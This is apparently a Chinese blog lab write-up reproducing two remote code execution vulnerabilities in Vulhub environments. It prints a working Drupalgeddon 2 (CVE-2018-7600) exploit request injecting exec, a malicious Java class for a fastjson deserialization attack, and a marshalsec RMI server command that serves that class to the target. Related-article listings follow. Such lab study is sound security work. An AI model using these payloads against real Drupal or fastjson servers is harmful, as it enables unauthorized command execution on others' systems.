Vulhub漏洞复现系列(二):常见远程代码执行漏洞剖析

最新推荐文章于 2025-05-15 15:05:01 发布
最新推荐文章于 2025-05-15 15:05:01 发布
阅读量785 收藏 4
点赞数 17
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75445650/article/details/147873469
版权

目录

一.Drupal/CVE-2018-7600

1.搭建环境

2.漏洞复现

3.攻击原理

二.fastjson

1.搭建环境

2.漏洞复现

一.Drupal/CVE-2018-7600

背景:Drupal是一个流行的PHP内容管理系统,CVE-2018-7600 是该项目历史上最严重的漏洞之一,因此被称为 Drupalgeddon 2。出现的漏洞的原因就是Drupal在渲染表单元素时,允许用户传入的结构被直接执行为回调函数,本质是不可信输入被传入可执行上下文,是一种典型的“反序列化”,“动态执行”问题。

1.搭建环境

结束后:

2.漏洞复现

使用Burp Suite进行抓包,发送以下数据包

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Host: 192.168.101.152:8080

Content-Type: application/x-www-form-urlencoded

Content-Length: 109

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=uname -a

解释:

参数作用利用点
form_id=user_register_form指定操作的 Drupal 表单(这里是用户注册)指定处理逻辑
_drupal_ajax=1表明这是一个 AJAX 请求触发 AJAX 回调处理路径
element_parents=account/mail/%23value告诉 Drupal 该请求是针对表单中 account[mail][#value] 这个字段的控制参数注入点路径
mail[#post_render][]=exec注入 PHP 的 exec() 函数到表单字段的渲染钩子关键:命令执行点
mail[#type]=markup设置该字段的类型为 markup(直接渲染 HTML)允许 #markup 生效
mail[#markup]=id/其他等等注入的参数,将作为 exec("id") 被执行注入命令

结果:我在命令处写了uname -a,data部分就显示了该系统内核版本

3.攻击原理

CVE-2018-7600 的攻击原理在于 Drupal 在处理未认证用户提交的 AJAX 表单请求时,未对结构化参数(如 #post_render)进行有效过滤,攻击者可通过精心构造的请求,将任意 PHP 函数(如 exec)注入表单字段的渲染流程中,从而导致服务器在生成响应时执行恶意命令,最终实现远程代码执行(RCE)。

二.fastjson

背景:Fastjson 是阿里巴巴开源的一个高性能 Java JSON 处理库,用于在 Java 应用中快速地将对象与 JSON 数据互相转换。自 2011 年开源以来,凭借其出色的解析速度和易用的 API,广泛应用于国内外的 Java 项目中。尽管功能强大,但 Fastjson 的一个设计特点——可以自动根据传入 JSON 的类型字段(@type)动态实例化类对象,带来了严重的安全隐患。如果传入的数据未做严格校验,攻击者可以构造恶意 JSON 数据,利用 Fastjson 的反序列化机制加载任意类,触发类的构造函数或特定的 getter 方法执行代码,从而造成远程命令执行(RCE)等安全问题。

1.搭建环境

2.漏洞复现

1)创建出发漏洞的Java类

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/successFrank"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

解释:这段 Java 代码的目的是在反序列化时触发代码执行。类 TouchFile 在静态代码块中执行了一个命令,即创建一个名为 /tmp/successFrank 的文件。

2)编译和传输TouchFile.class文件

3)启用HTTP服务来提供.class文件

4)启动marshalsec RMI服务

marshalsec 是一个工具,用于在远程代码执行攻击中构造和加载恶意的 Java 类。你需要使用 marshalsec 来启动 RMI 服务并将 TouchFile.class 文件加载到目标服务器上。)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://<虚拟机IP>:4444/#TouchFile" 9999

5)发现java和javac的版本必须得是1.8的,后面就没有继续

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1766
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 2311
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1270
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1407
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1449
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638)
qq_51577576的博客
10-17 757
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638) 在使用基于Jakarta插件的文件上传功能时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 942
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135)
qq_51577576的博客
11-19 907
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞(S2-001)
qq_51577576的博客
08-21 1288
Struts2 远程命令执行漏洞(S2-001) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。
安全巡检清单
yh
05-15 762
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
PHP API安全设计四要素:构建坚不可摧的接口防护体系
每日一贴
05-11 784
分层防御:不要依赖单一安全措施,采用多层次防护最小权限原则:只授予必要的API访问权限定期轮换密钥:定期更换API密钥和加密密钥详细日志记录:记录所有API请求用于审计和分析API版本控制:通过版本号管理接口变更输入验证:严格验证所有输入参数错误处理:避免暴露敏感信息的错误消息通过实施这些安全措施,您的PHP API将能够抵御大多数常见攻击,确保数据传输的安全性和完整性。
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 519
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
除了GC哪些地方有用到安全
有时间就写写代码
05-15 502
安全点在多个编程场景中至关重要,尤其是在并发编程和多线程环境中。首先,在多线程同步中,安全点通过锁机制(如ReentrantLock)确保线程在访问共享资源时不会被中断,避免竞争条件。其次,在内存屏障中,安全点(如volatile关键字)防止指令重排序,确保多核处理器中的数据一致性。此外,在数据库事务中,保存点作为安全点允许部分回滚,提升性能。最后,在实时操作系统中,安全点通过资源锁定确保任务切换时的系统稳定性。总之,安全点在多线程、内存管理、数据库和实时系统等场景中,通过确保一致性和安全性,有效避免了竞态
什么是TCP协议?它存在哪些安全挑战?
yundun_no1的博客
05-15 304
TCP(传输控制协议)是互联网中面向连接、可靠的传输层协议,主要负责在不可靠的IP层上实现数据的可靠传输。面向连接:通信前需通过三次握手(SYN-SYN/ACK-ACK)建立连接,确保双方就绪。可靠性:通过序列号、确认应答(ACK)、超时重传和校验和机制,保障数据无丢失、无重复、按序到达。流量控制与拥塞控制:使用滑动窗口动态调整发送速率,避免网络过载。全双工通信:支持双向数据传输,双方可同时发送和接收数据。TCP协议是互联网的基石,但其安全性依赖于上层协议和管理措施。
【SSL证书系列】操作系统如何保障根证书的有效性和安全
DZ Space
05-14 969
操作系统通过多层安全机制保障根证书的有效性和安全性,防止篡改、伪造或滥用。核心措施包括:根证书存储在受保护的隔离区域,结合硬件级保护;操作系统预装通过严格审核的权威CA证书,定期审查和淘汰不安全证书;采用自动签名更新和防回滚机制,确保证书链验证的完整性;引入安全启动、内存保护、沙箱等防御性技术;通过权限控制和警告机制限制用户操作;建立应急响应机制,支持手动吊销和实时检查证书状态;防御中间人攻击和CA私钥泄露等场景;提供用户教育工具和透明度公告。这些措施构建了多层防御体系,最大限度降低风险。
人脸识别备案:筑牢人脸信息 “安全墙”
2501_91088474的博客
05-13 592
人脸识别备案制度主要依据《人脸识别技术应用安全管理办法》建立,人脸识别技术广泛应用于安防、金融、门禁、交通等领域,带来便利高效的同时,人脸信息安全问题也引发担忧。为规范技术应用、保护个人信息权益,人脸识别备案制度应运而生。
HGDB企业版迁移到HGDB安全
HighGO
05-15 624
F format或者–format=format:设定文件输出的格式,format的值有p(plain)、c(custom)等,p是备份成纯文本的SQL脚 本,c是自定义格式,选择c时,文件扩展名一般是.backup。-n schema或者–schema=schema:指定备份的模式,多个模式时写-n schema1 -n schema2…-a, --data-only: 只转储数据,不包括模式。-s或者–schema-only:只备份DDL,与–data-only相反。
获取高德地图JS API的安全密钥和Key的方法
qq_60245590的博客
05-12 590
要使用高德地图JavaScript API,您需要获取API Key和安全密钥(securityJsCode)
如何安全配置好CDN用于防止DDoS与Web攻击 ?
最新发布
2409_89014517的博客
05-15 610
如何安全配置好CDN用于防止DDoS与Web攻击 ?
vulhub docker漏洞复现
02-21
### 使用Vulhub复现Docker安全漏洞 #### 准备工作 为了使用Vulhub进行漏洞复现,需先确保已安装并配置好`docker`和`docker-compose`工具。这一步骤至关重要,因为后续操作依赖于这两个软件来构建和管理容器化应用环境。 #### 获取Vulhub项目源码 访问[Vulhub GitHub仓库](https://github.com/vulhub/vulhub),克隆整个项目到本地计算机上。通过Git命令可以轻松完成此过程: ```bash git clone https://github.com/vulhub/vulhub.git ``` #### 构建特定漏洞场景 进入想要测试的具体漏洞目录下,比如针对未授权远程代码执行(Unauthorized RCE)漏洞,则切换至对应文件夹位置: ```bash cd vulhub/docker/unauthorized-rce/ ``` 在此处执行如下指令以启动服务: ```bash docker-compose build docker-compose up -d ``` 上述命令会依据定义好的`docker-compose.yml`文件自动下载所需的基础镜像、设置网络连接以及启动相关联的服务实例[^3]。 #### 验证漏洞存在性 一旦成功搭建起目标应用程序及其关联组件之后,就可以按照官方文档或者其他参考资料中的指导来进行攻击尝试,验证该环境中确实存在着所描述的安全缺陷。对于某些复杂类型的漏洞可能还需要额外准备一些辅助脚本或工具来帮助分析问题所在。 #### 清理资源 实验结束后记得停止所有正在运行的容器,并移除不再使用的数据卷以免占用过多系统资源: ```bash docker-compose down --volumes ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你好我是小美

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值